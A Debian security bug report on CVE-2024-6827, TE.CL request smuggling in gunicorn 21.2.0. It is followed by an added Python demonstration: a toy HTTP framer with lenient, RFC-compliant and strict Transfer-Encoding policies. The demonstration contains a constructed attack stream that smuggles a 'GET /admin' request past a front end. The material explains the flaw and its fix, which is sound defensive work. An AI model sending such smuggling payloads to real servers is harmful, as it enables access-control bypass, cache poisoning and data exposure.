Source: gunicorn
X-Debbugs-CC: team@security.debian.org
Severity: important
Tags: security
Hi,
The following vulnerability was published for gunicorn.
CVE-2024-6827[0]:
| Gunicorn version 21.2.0 does not properly validate the value of the
| 'Transfer-Encoding' header as specified in the RFC standards, which
| leads to the default fallback method of 'Content-Length,' making it
| vulnerable to TE.CL request smuggling. This vulnerability can lead
| to cache poisoning, data exposure, session manipulation, SSRF, XSS,
| DoS, data integrity compromise, security bypass, information
| leakage, and business logic abuse.
https://huntr.com/bounties/1b4f8f38-39da-44b6-9f98-f618639d0dd7
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0]
https://security-tracker.debian.org/tracker/CVE-2024-6827
https://www.cve.org/CVERecord?id=CVE-2024-6827
Please adjust the affected versions in the BTS as needed.
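As an added illustration of the TE.CL desync the CVE text describes (example code written for this page, not gunicorn's code and not part of the huntr report): a toy HTTP/1.1 request framer run with three Transfer-Encoding policies over the same constructed byte stream. lenient_framing models the bug class named above (anything but the bare value "chunked" is ignored and framing falls back to Content-Length); te_precedence_framing models an RFC 9112 front end that lets Transfer-Encoding win; strict_framing is a hardened back end that refuses a request carrying both headers. The header value "gzip, chunked", the /admin target, the policy names and the sample requests are all assumptions made for the example; which Transfer-Encoding values gunicorn 21.2.0 actually mishandled is not stated in the report.

```python
"""Added example (not gunicorn's code, not from the bug report): a toy HTTP/1.1
request framer with three Transfer-Encoding policies, showing how a hop that
falls back to Content-Length when it does not recognise the Transfer-Encoding
value desynchronises from a hop that honours chunked framing (TE.CL)."""
import re
from typing import Callable, Dict, List, Optional, Tuple, Union

CRLF = b"\r\n"
REQUEST_LINE = re.compile(rb"^[A-Z]+ \S+ HTTP/1\.[01]$")
KNOWN_CODINGS = {b"gzip", b"deflate", b"compress"}  # assumed supported codings
Headers = Dict[bytes, List[bytes]]
Framing = Union[str, int]  # "chunked" or a Content-Length byte count


class Reject(Exception):
    """Request must be refused with 400 instead of being framed."""


def lenient_framing(h: Headers) -> Framing:
    """Hypothetical bug-class policy matching the CVE text: only the exact value
    "chunked" is recognised; any other Transfer-Encoding is silently ignored and
    framing falls back to Content-Length (0 if absent)."""
    if h.get(b"transfer-encoding") == [b"chunked"]:
        return "chunked"
    return int(h.get(b"content-length", [b"0"])[0])


def te_precedence_framing(h: Headers) -> Framing:
    """RFC 9112 section 6.3 behaviour of a typical front end: a present
    Transfer-Encoding overrides Content-Length, chunked must be the final
    coding, and unknown codings are refused."""
    te = h.get(b"transfer-encoding")
    if te is None:
        return int(h.get(b"content-length", [b"0"])[0])
    codings = [c.strip().lower() for v in te for c in v.split(b",")]
    if codings[-1] != b"chunked" or any(c not in KNOWN_CODINGS for c in codings[:-1]):
        raise Reject("unsupported or non-final transfer coding")
    return "chunked"


def strict_framing(h: Headers) -> Framing:
    """Hardened back end: as above, and a request carrying both headers is
    refused outright (the 400 that RFC 9112 section 6.3 permits)."""
    if b"transfer-encoding" in h and b"content-length" in h:
        raise Reject("Transfer-Encoding together with Content-Length")
    return te_precedence_framing(h)


def _read_head(buf: bytes) -> Optional[Tuple[bytes, Headers, bytes]]:
    """Return (request_line, headers, rest) or None if the head is incomplete."""
    end = buf.find(CRLF + CRLF)
    if end < 0:
        return None
    lines = buf[:end].split(CRLF)
    if not REQUEST_LINE.match(lines[0]):
        raise Reject("malformed request line")
    headers: Headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep or not name or name != name.strip():  # no whitespace around names
            raise Reject("malformed header line")
        headers.setdefault(name.lower(), []).append(value.strip())
    return lines[0], headers, buf[end + 4:]


def _read_chunked(buf: bytes) -> Tuple[bytes, bytes]:
    """Decode a chunked body (empty trailer section only); return (body, rest)."""
    body = b""
    while True:
        nl = buf.find(CRLF)
        if nl < 0:
            raise Reject("truncated chunk-size line")
        size = int(buf[:nl].split(b";")[0], 16)  # chunk extensions are dropped
        buf = buf[nl + 2:]
        if size == 0:
            if not buf.startswith(CRLF):
                raise Reject("trailers not supported")
            return body, buf[2:]
        if len(buf) < size + 2 or buf[size:size + 2] != CRLF:
            raise Reject("truncated or malformed chunk")
        body, buf = body + buf[:size], buf[size + 2:]


def frame_requests(stream: bytes, policy: Callable[[Headers], Framing]) -> List[Tuple[bytes, bytes]]:
    """Split a byte stream into (request_line, body) pairs under `policy`.
    Codings other than chunked are not undone; only message boundaries matter here."""
    out, buf = [], stream
    while True:
        head = _read_head(buf.lstrip(CRLF))  # tolerate leading empty lines
        if head is None:
            return out
        request_line, headers, buf = head
        framing = policy(headers)
        if framing == "chunked":
            body, buf = _read_chunked(buf)
        else:
            if len(buf) < framing:
                raise Reject("truncated body")
            body, buf = buf[:framing], buf[framing:]
        out.append((request_line, body))


def request_targets(stream: bytes, policy) -> List[bytes]:
    return [line.split(b" ")[1] for line, _ in frame_requests(stream, policy)]


def rejected(stream: bytes, policy) -> bool:
    try:
        frame_requests(stream, policy)
    except Reject:
        return True
    return False


# Constructed attacker stream (not from the report). The Transfer-Encoding value
# is an assumption: RFC-valid with chunked final, but not the bare "chunked" the
# lenient policy insists on. Content-Length: 4 covers exactly the "3a\r\n"
# chunk-size line (len(SMUGGLED) == 58 == 0x3a); the smuggled request's own
# Content-Length: 7 swallows the trailing "\r\n0\r\n\r\n" chunk terminator.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: internal\r\nContent-Length: 7\r\n\r\n"
ATTACK = (b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 4\r\n"
          b"Transfer-Encoding: gzip, chunked\r\n\r\n"
          + b"%x\r\n" % len(SMUGGLED) + SMUGGLED + b"\r\n0\r\n\r\n")
BENIGN = b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 3\r\n\r\nabc"

if __name__ == "__main__":
    print("front end, TE wins:", request_targets(ATTACK, te_precedence_framing))  # [b'/']
    print("lenient back end  :", request_targets(ATTACK, lenient_framing))  # [b'/', b'/admin']
    print("strict back end   :", "400" if rejected(ATTACK, strict_framing) else "accepted")
```

Run as a script, the front end frames the stream as one POST whose body is the smuggled request, the lenient back end frames it as a POST followed by a separate GET /admin (the desync an attacker then exploits for the effects the CVE text lists), and the strict back end answers the first request with 400. The property generalises beyond this header value: any two hops that disagree on where a message ends form a smuggling pair, which is why the correct fix is to reject a Transfer-Encoding you cannot frame rather than fall back to Content-Length.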